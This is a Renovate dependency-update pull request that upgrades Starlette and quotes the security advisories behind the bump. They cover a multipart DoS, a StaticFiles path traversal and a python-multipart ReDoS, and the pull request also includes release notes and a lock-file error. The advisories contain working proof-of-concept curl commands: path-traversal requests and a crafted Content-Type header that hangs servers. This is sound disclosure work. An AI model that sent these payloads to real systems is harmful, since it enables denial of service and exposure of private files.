chore(deps): update dependency starlette to v0.36.2 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
starlette (changelog)	^0.22.0 -> ^0.36.0
starlette (changelog)	==0.25.0 -> ==0.36.2

GitHub Vulnerability Alerts

GHSA-74m5-2c7w-9w3x

Impact

The MultipartParser using the package python-multipart accepts an unlimited number of multipart parts (form fields or files).

Processing too many parts results in high CPU usage and high memory usage, eventually leading to an OOM process kill.

This can be triggered by sending too many small form fields with no content, or too many empty files.

For this to take effect application code has to:

• Have python-multipart installed and
• call request.form()
  • or via another framework like FastAPI, using form field parameters or UploadFile parameters, which in turn calls request.form().

Patches

The vulnerability is solved in Starlette 0.25.0 by making the maximum fields and files customizable and with a sensible default (1000).

Applications will be secure by just upgrading their Starlette version to 0.25.0 (or FastAPI to 0.92.0).

If application code needs to customize the new max field and file number, there are new request.form() parameters (with the default values):

• max_files=1000
• max_fields=1000

Workarounds

Applications that don't install python-multipart or that don't use form fields are safe.

In older versions, it's also possible to instead of calling request.form() call request.stream() and parse the form data in internal code.

In most cases, the best solution is to upgrade the Starlette version.

References

This was reported in private by @​das7pad via internal email. He also coordinated the fix across multiple frameworks and parsers.

The details about how multipart/form-data is structured and parsed are in the RFC 7578.

CVE-2023-30798

There MultipartParser usage in Encode's Starlette python framework before versions 0.25.0 allows an unauthenticated and remote attacker to specify any number of form fields or files which can cause excessive memory usage resulting in denial of service of the HTTP service.

CVE-2023-29159

Summary

When using StaticFiles, if there's a file or directory that starts with the same name as the StaticFiles directory, that file or directory is also exposed via StaticFiles which is a path traversal vulnerability.

Details

The root cause of this issue is the usage of os.path.commonprefix():
https://github.com/encode/starlette/blob/4bab981d9e870f6cee1bd4cd59b87ddaf355b2dc/starlette/staticfiles.py#L172-L174

As stated in the Python documentation (https://docs.python.org/3/library/os.path.html#os.path.commonprefix) this function returns the longest prefix common to paths.

When passing a path like /static/../static1.txt, os.path.commonprefix([full_path, directory]) returns ./static which is the common part of ./static1.txt and ./static, It refers to /static/../static1.txt because it is considered in the staticfiles directory. As a result, it becomes possible to view files that should not be open to the public.

The solution is to use os.path.commonpath as the Python documentation explains that os.path.commonprefix works a character at a time, it does not treat the arguments as paths.

PoC

In order to reproduce the issue, you need to create the following structure:

├── static
│   ├── index.html
├── static_disallow
│   ├── index.html
└── static1.txt

And run the Starlette app with:

import uvicorn
from starlette.applications import Starlette
from starlette.routing import Mount
from starlette.staticfiles import StaticFiles

routes = [
    Mount("/static", app=StaticFiles(directory="static", html=True), name="static"),
]

app = Starlette(routes=routes)

if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=8000)

And running the commands:

curl --path-as-is 'localhost:8000/static/../static_disallow/'
curl --path-as-is 'localhost:8000/static/../static1.txt'

The static1.txt and the directory static_disallow are exposed.

Impact

Confidentiality is breached: An attacker may obtain files that should not be open to the public.

Credits

Security researcher Masashi Yamane of LAC Co., Ltd reported this vulnerability to JPCERT/CC Vulnerability Coordination Group and they contacted us to coordinate a patch for the security issue.

CVE-2024-24762

Summary

When using form data, python-multipart uses a Regular Expression to parse the HTTP Content-Type header, including options.

An attacker could send a custom-made Content-Type option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.

This can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS

This only applies when the app uses form data, parsed with python-multipart.

Details

A regular HTTP Content-Type header could look like:

Content-Type: text/html; charset=utf-8

python-multipart parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74

A custom option could be made and sent to the server to break it with:

Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

PoC

Create a simple WSGI application, that just parses the Content-Type, and run it with python main.py:

# main.py
from wsgiref.simple_server import make_server
from wsgiref.validate import validator

from multipart.multipart import parse_options_header

def simple_app(environ, start_response):
    _, _ = parse_options_header(environ["CONTENT_TYPE"])

    start_response("200 OK", [("Content-type", "text/plain")])
    return [b"Ok"]

httpd = make_server("", 8123, validator(simple_app))
print("Serving on port 8123...")
httpd.serve_forever()

Then send the attacking request with:

$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8123/'

Impact

It's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data. This way it also affects other libraries using Starlette, like FastAPI.

Original Report

This was originally reported to FastAPI as an email to [email protected], sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r

Original report to FastAPI

Hey Tiangolo!

My name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @​nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).

Here are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:

from typing import Annotated
from fastapi.responses import HTMLResponse
from fastapi import FastAPI,Form
from pydantic import BaseModel

class Item(BaseModel):
    username: str

app = FastAPI()

@​app.get("/", response_class=HTMLResponse)
async def index():
    return HTMLResponse("Test", status_code=200)

@​app.post("/submit/")
async def submit(username: Annotated[str, Form()]):
    return {"username": username}

@​app.post("/submit_json/")
async def submit_json(item: Item):
    return {"username": item.username}

I'm running the above with uvicorn with the following command:

uvicorn server:app

Then run the following cUrl command:

curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'

You'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%

You can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.

If you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.

Cheers

Impact

An attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.

Occurrences

params.py L586

---

Release Notes

encode/starlette (starlette)

v0.36.2: Version 0.36.2

Compare Source

Fixed

• Upgrade python-multipart to 0.0.7 13e5c26.
• Avoid duplicate charset on Content-Type #​2443.

---

Full Changelog: encode/starlette@0.36.1...0.36.2

v0.36.1: Version 0.36.1

Compare Source

Fixed

• Check if "extensions" in scope before checking the extension #​2438.

---

Full Changelog: encode/starlette@0.36.0...0.36.1

v0.36.0: Version 0.36.0

Compare Source

Added

• Add support for ASGI pathsend extension #​2435.
• Cancel WebSocketTestSession on close #​2427.
• Raise WebSocketDisconnect when WebSocket.send() excepts IOError #​2425.
• Raise FileNotFoundError when the env_file parameter on Config is not valid #​2422.

---

Full Changelog: encode/starlette@0.35.1...0.36.0

v0.35.1: Version 0.35.1

Compare Source

Fixed

• Stop using the deprecated "method" parameter in FileResponse inside of StaticFiles #​2406.
• Make typing-extensions optional again #​2409.

---

Full Changelog: encode/starlette@0.35.0...0.35.1

v0.35.0: Version 0.35.0

Compare Source

Added

• Add *args to Middleware and improve its type hints #​2381.

Fixed

• Use Iterable instead Iterator on iterate_in_threadpool #​2362.

Changes

• Handle root_path to keep compatibility with mounted ASGI applications and WSGI #​2400.
• Turn scope["client"] to None on TestClient #​2377.

---

Full Changelog: encode/starlette@0.34.0...0.35.0

v0.34.0: Version 0.34.0

Compare Source

Added

• Use ParamSpec for run_in_threadpool #​2375.
• Add UploadFile.__repr__ #​2360.

Fixed

• Merge URLs properly on TestClient #​2376.
• Take weak ETags in consideration on StaticFiles #​2334.

Deprecated

• Deprecate FileResponse(method=...) parameter #​2366.

---

Full Changelog: encode/starlette@0.33.0...0.34.0

v0.33.0: Version 0.33.0

Compare Source

Added

• Add middleware per Route/WebSocketRoute #​2349.
• Add middleware per Router #​2351.

Fixed

• Do not overwrite "path" and "root_path" scope keys #​2352.
• Set ensure_ascii=False on json.dumps() for WebSocket.send_json() #​2341.

v0.32.0: Version 0.32.0

Compare Source

Added

• Send reason on WebSocketDisconnect #​2309.
• Add domain parameter to SessionMiddleware #​2280.

Changed

• Inherit from HTMLResponse instead of Response on _TemplateResponse #​2274.
• Restore the Response.render type annotation to its pre-0.31.0 state #​2264.

---

Full Changelog: encode/starlette@0.31.1...0.32.0

v0.31.1: Version 0.31.1

Compare Source

Fixed

• Fix import error when exceptiongroup isn't available #​2231.
• Set url_for global for custom Jinja environments #​2230.

Full Changelog: encode/starlette@0.31.0...0.31.1

v0.31.0: Version 0.31.0

Compare Source

Added

• Officially support Python 3.12 #​2214.
• Support AnyIO 4.0 #​2211.
• Strictly type annotate Starlette (strict mode on mypy) #​2180.

Fixed

• Don't group duplicated headers on a single string when using the TestClient #​2219.

---

Full Changelog: encode/starlette@0.30.0...0.31.0

v0.30.0: Version 0.30.0

Compare Source

Removed

• Drop Python 3.7 support #​2178.

v0.29.0: Version 0.29.0

Compare Source

Added

• Add follow_redirects parameter to TestClient #​2207.
• Add __str__ to HTTPException and WebSocketException #​2181.
• Warn users when using lifespan together with on_startup/on_shutdown #​2193.
• Collect routes from Host to generate the OpenAPI schema #​2183.
• Add request argument to TemplateResponse #​2191.

Fixed

• Stop body_stream in case more_body=False on BaseHTTPMiddleware #​2194.

Full Changelog: encode/starlette@0.28.0...0.29.0

v0.28.0: Version 0.28.0

Compare Source

Changed

• Reuse Request's body buffer for call_next in BaseHTTPMiddleware #​1692.
• Move exception handling logic to Route #​2026.

Added

• Add env parameter to Jinja2Templates, and deprecate **env_options #​2159.
• Add clear error message when httpx is not installed #​2177.

Fixed

• Allow "name" argument on templates url_for() #​2127.

Full Changelog: encode/starlette@0.27.0...0.28.0

v0.27.0: Version 0.27.0

Compare Source

This release fixes a path traversal vulnerability in StaticFiles. You can view the full security advisory:
GHSA-v5gw-mw7f-84px

Added

• Minify JSON websocket data via send_json https://github.com/encode/starlette/pull/2128

Fixed

• Replace commonprefix by commonpath on StaticFiles 1797de4.
• Convert ImportErrors into ModuleNotFoundError #​2135.
• Correct the RuntimeError message content in websockets #​2141.

Full Changelog: encode/starlette@0.26.1...0.27.0

v0.26.1: Version 0.26.1

Compare Source

Fixed

• Fix typing of Lifespan to allow subclasses of Starlette #​2077.

v0.26.0: Version 0.26.0

Compare Source

Added

• Support lifespan state #​2060, #​2065 and #​2064.

Changed

• Change url_for signature to return a URL instance #​1385.

Fixed

• Allow "name" argument on url_for() and url_path_for() #​2050.

Deprecated

• Deprecate on_startup and on_shutdown events #​2070.

Full Changelog: encode/starlette@0.25.0...0.26.0

v0.25.0: Version 0.25.0

Compare Source

Fixed

• Limit the number of fields and files when parsing multipart/form-data on the MultipartParser 8c74c2c and #​2036.

v0.24.0: Version 0.24.0

Compare Source

Added

• Allow StaticFiles to follow symlinks #​1683.
• Allow Request.form() as a context manager #​1903.
• Add size attribute to UploadFile #​1405.
• Add env_prefix argument to Config #​1990.
• Add template context processors #​1904.
• Support str and datetime on expires parameter on the Response.set_cookie method #​1908.

Changed

• Lazily build the middleware stack #​2017.
• Make the file argument required on UploadFile #​1413.
• Use debug extension instead of custom response template extension #​1991.

Fixed

• Fix url parsing of ipv6 urls on URL.replace #​1965.

v0.23.1: Version 0.23.1

Compare Source

Fixed

• Only stop receiving stream on body_stream if body is empty on the BaseHTTPMiddleware #​1940.

v0.23.0: Version 0.23.0

Compare Source

Added

• Add headers parameter to the TestClient #​1966.

Deprecated

• Deprecate Starlette and Router decorators #​1897.

Fixed

• Fix bug on FloatConvertor regex #​1973.

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: poetry.lock

Updating dependencies
Resolving dependencies...


The current project's Python requirement (>=3.7,<4.0) is not compatible with some of the required packages Python requirement:
  - starlette requires Python >=3.8, so it will not be satisfied for Python >=3.7,<3.8
  - starlette requires Python >=3.8, so it will not be satisfied for Python >=3.7,<3.8
  - starlette requires Python >=3.8, so it will not be satisfied for Python >=3.7,<3.8
  - starlette requires Python >=3.8, so it will not be satisfied for Python >=3.7,<3.8

Because no versions of starlette match >0.36.0,<0.36.1 || >0.36.1,<0.36.2 || >0.36.2,<0.36.3 || >0.36.3,<0.37.0
 and starlette (0.36.0) requires Python >=3.8, starlette is forbidden.
And because starlette (0.36.1) requires Python >=3.8
 and starlette (0.36.2) requires Python >=3.8, starlette is forbidden.
So, because starlette (0.36.3) requires Python >=3.8
 and slowapi depends on starlette (^0.36.0), version solving failed.

  • Check your dependencies Python requirement: The Python requirement can be specified via the `python` or `markers` properties
    
    For starlette, a possible solution would be to set the `python` property to ">=3.8,<4.0"
    For starlette, a possible solution would be to set the `python` property to ">=3.8,<4.0"
    For starlette, a possible solution would be to set the `python` property to ">=3.8,<4.0"
    For starlette, a possible solution would be to set the `python` property to ">=3.8,<4.0"

    https://python-poetry.org/docs/dependency-specification/#python-restricted-dependencies,
    https://python-poetry.org/docs/dependency-specification/#using-environment-markers